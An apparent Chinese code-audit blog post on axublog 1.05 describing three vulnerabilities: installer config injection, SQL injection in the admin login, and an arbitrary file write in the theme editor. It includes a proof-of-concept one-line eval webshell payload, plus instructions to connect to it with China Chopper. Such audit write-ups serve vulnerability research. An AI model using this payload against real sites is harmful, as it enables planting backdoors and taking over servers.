00x1 安装漏洞

  install/cmsconfig.php

 function step4(){

 $root=$_POST["root"];

 $dbuser=$_POST["dbuser"];

 $dbpsw=$_POST["dbpsw"];

 $dbname=$_POST["dbname"];

 $tabhead=$_POST["tabhead"];

 $ad_user=$_POST["ad_user"];

 $ad_psw=$_POST["ad_psw"];

 $webname=$_POST["webname"];

 $weburl=$_POST["weburl"];

 $webinfo=$_POST["webinfo"];

 $webkeywords=$_POST["webkeywords"];

 $webauthor=$_POST["webauthor"];

这几个都是可控的,并没有进行任何处理。然后传到了$text2,然后又写到了cmsconfig.php当中。

 $file="config_empty.php";

 $fp=fopen($file,"r"); //以写入方式打开文件

 $text2=fread($fp,4096); //读取文件内容

 $text2=str_replace('@root@',$root,$text2);

 $text2=str_replace('@dbuser@',$dbuser,$text2);

 $text2=str_replace('@dbpsw@',$dbpsw,$text2);

 $text2=str_replace('@dbname@',$dbname,$text2);

 $text2=str_replace('@tabhead@',$tabhead,$text2);

 $text2=str_replace('@webname@',$webname,$text2);

 $text2=str_replace('@weburl@',$weburl,$text2);

 $text2=str_replace('@webinfo@',$webinfo,$text2);

 $text2=str_replace('@webkeywords@',$webkeywords,$text2);

 $text2=str_replace('@webauthor@',$webauthor,$text2);

 $file="../cmsconfig.php"; //定义文件

 $fp=fopen($file,"w"); //以写入方式打开文件

 fwrite($fp,$text2);

 @unlink("goinstall.php");

这个漏洞比较简单,直接在配置信息中填写一句话闭合就可以getshell了。

POC:"@eval($_POST['xishaonian'])

然后菜刀直接连接就cmsconfig.php即可。

注:该漏洞也在后台直接可以插一句话

 00x2 SQL注入

ad/admin.php

 chkoutpost();

 $ad_user=$_POST["ad_user"];

 $ad_psw=$_POST["ad_psw"];$ad_psw = authcode(@$ad_psw, 'ENCODE', 'key',);

 global $tabhead;

 $tab=$tabhead."adusers";

 mysql_select_db($tab);

 $sql = mysql_query("select * from ".$tab." where adnaa='".$ad_user."'");

很简答可以看到$ad_user没有过滤。直接性导致sql注入。

00x3

 <?php

 function edit2save(){

 global $themepath;

 ?>

 <div class="yj_green" id=full>

 <b class="b1"></b><b class="b2"></b><b class="b3"></b><b class="b4"></b>

 <div class="boxcontent">

 <h2><a href="?">主题管理</a> > <a href="javascript:history.go(-2)">编辑主题</a> > 编辑文件 > <a href="javascript:history.back()">返回</a></h2>

 </div>

 <div class="t1"><div class="t2">

 <?php

 $path=$_REQUEST['path'];

 $content=stripslashes($_REQUEST['content']);

 ?>

 <p>编辑文件:<?=$path?></p>

 <?php

 if($path==''){echo'文件路径错误!';exit;}

 if(file_put_contents ($path, $content)){echo"保存文件成功!";}

 else{echo"保存文件失败!";}

 ?>

 </div></div>

 <b class="b4b"></b><b class="b3b"></b><b class="b2b"></b><b class="b1b"></b>

 </div>

axublog 1.05代码审计的更多相关文章

  1. PHP代码审计05之正则使用不当

    前言 根据红日安全写的文章,学习PHP代码审计的第五节内容,题目均来自PHP SECURITY CALENDAR 2017,讲完题目会用一道CTF的题目和实例来加深巩固.这是之前写的,有兴趣可以去看看 ...

  2. auxblogcms1.0.6|代码审计

    这周的审计任务,两天前的任务呀~拖延症呀~ 这次审计一个博客----auxblogcms1.0.6,网上也有所记载,我下面会做个总结. axublog是一款php个人博客系统,小巧强大的PHP+MyS ...

  3. 代码审计之XiaoCms(后台任意文件上传至getshell,任意目录删除,会话固定漏洞)

    0x00 前言 这段时间就一直在搞代码审计了.针对自己的审计方法做一下总结,记录一下步骤. 审计没他,基础要牢,思路要清晰,姿势要多且正. 下面是自己审计的步骤,正在逐步调整,寻求效率最高. 0x01 ...

  4. axublogcms1.0.6|代码审计

    这周的审计任务,两天前的任务呀~拖延症呀~ 这次审计一个博客----auxblogcms1.0.6,网上也有所记载,我下面会做个总结. axublog是一款php个人博客系统,小巧强大的PHP+MyS ...

  5. [代码审计]XiaoCms(后台任意文件上传至getshell,任意目录删除,会话固定漏洞)

    0x00 前言 这段时间就一直在搞代码审计了.针对自己的审计方法做一下总结,记录一下步骤. 审计没他,基础要牢,思路要清晰,姿势要多且正. 下面是自己审计的步骤,正在逐步调整,寻求效率最高. 0x01 ...

  6. PHP代码审计基础-初级篇

    对于php代码审计我也是从0开始学的,对学习过程进行整理输出沉淀如有不足欢迎提出共勉.对学习能力有较高要求,整个系列主要是在工作中快速精通php代码审计,整个学习周期5天 ,建议花一天时间熟悉php语 ...

  7. ESPCMS-Seay自动加手工代码审计

    ESPcms代码审计 源码下载地址:http://yesky.91speed.org.cn/sw/180001_190000/rar/espcms_utf8_5.4.12.05.14.rar 1.自动 ...

  8. 代码审计系列题目CTFD部署(上)

    关于简单部署题目请参考:https://www.cnblogs.com/Cl0ud/p/13783325.html 如果需要进行较复杂部署,可参考本篇 PHP代码审计系列题目的部署,较之前的部署方案, ...

  9. 代码审计【根据功能点定向审计】BugFree ZSWin重装案例

    (哦对了!这些CMS代码不要安装在服务器上,先不说它们用来代码审计本身就是有漏洞的,而且在网上下载下来,也不能保证没有源码是否被篡改而留有后门,就安装在本地进行代码审计的练习即可) 我们先下载BugF ...

随机推荐

  1. ASP.NET MVC同时支持web与webapi模式

    原文地址:https://blog.csdn.net/laymat/article/details/65444701 我们在创建 web mvc项目时是不支持web api的接口方式访问的,所以我们需 ...

  2. Eclipse的数据库插件

    今天上午升级 Eclipse 到 3.1.2 版本,完了之后就想找个数据库的插件,但花了近 2 个小时后得出的结论是:还没有支持 3.1.x 版本的数据库插件,郁闷的不行.看看 eclipse3.1. ...

  3. PopUpWindow使用详解(二)——进阶及答疑

      相关文章:1.<PopUpWindow使用详解(一)——基本使用>2.<PopUpWindow使用详解(二)——进阶及答疑> 上篇为大家基本讲述了有关PopupWindow ...

  4. 如何修改电脑的本地网卡(非笔记本无限网卡)的mac地址

    计算机---设备管理器--找到对应的本地网卡---右键属性-----高级----网络地址

  5. 基于tornado的爬虫并发问题

    tornado中的coroutine是python中真正意义上的协程,与python3中的asyncio几乎是完全一样的,而且两者之间的future是可以相互转换的,tornado中有与asyncio ...

  6. Oozie4.2 安装部署、以及example测试

    编译: 使用的环境是:Hadoop2.6.0.Spark1.4.0.Hive0.13.1.Sqoop1.4.4 编译Oozie的命令:./mkdistro.sh -Phadoop-2 -Dhadoop ...

  7. SQL SERVER 的排序规则

    有时候查询数据库的时候会发现(比如做重名检查的时候):数据库的查询时对大小写不敏感的,也就是 A 和 a 是一样的. 也就是说 select * from tabletest where name = ...

  8. CentOS 7 安装开发者环境

    在vagrant box中安装了基本的centos7的box,但是,该环境没有安装编译软件,所以要求自行安装. 1.查看群组安装的源包数量: yum group list ,搜索Development ...

  9. 【Unity】2.11 了解游戏有哪些分类对你开阔思路有好处

    分类:Unity.C#.VS2015 创建日期:2016-03-31 一.简介 对游戏类型的划分有助于游戏的市场定位,以便吸引具有同一爱好的玩家群体.此外,制作游戏策划方案时,也通常会依据不同的游戏类 ...

  10. Debugging Java Native Memory Leaks

    GZIP造成JAVA Native Memory泄漏案例 https://www.elastic.co/blog/tracking-down-native-memory-leaks-in-elasti ...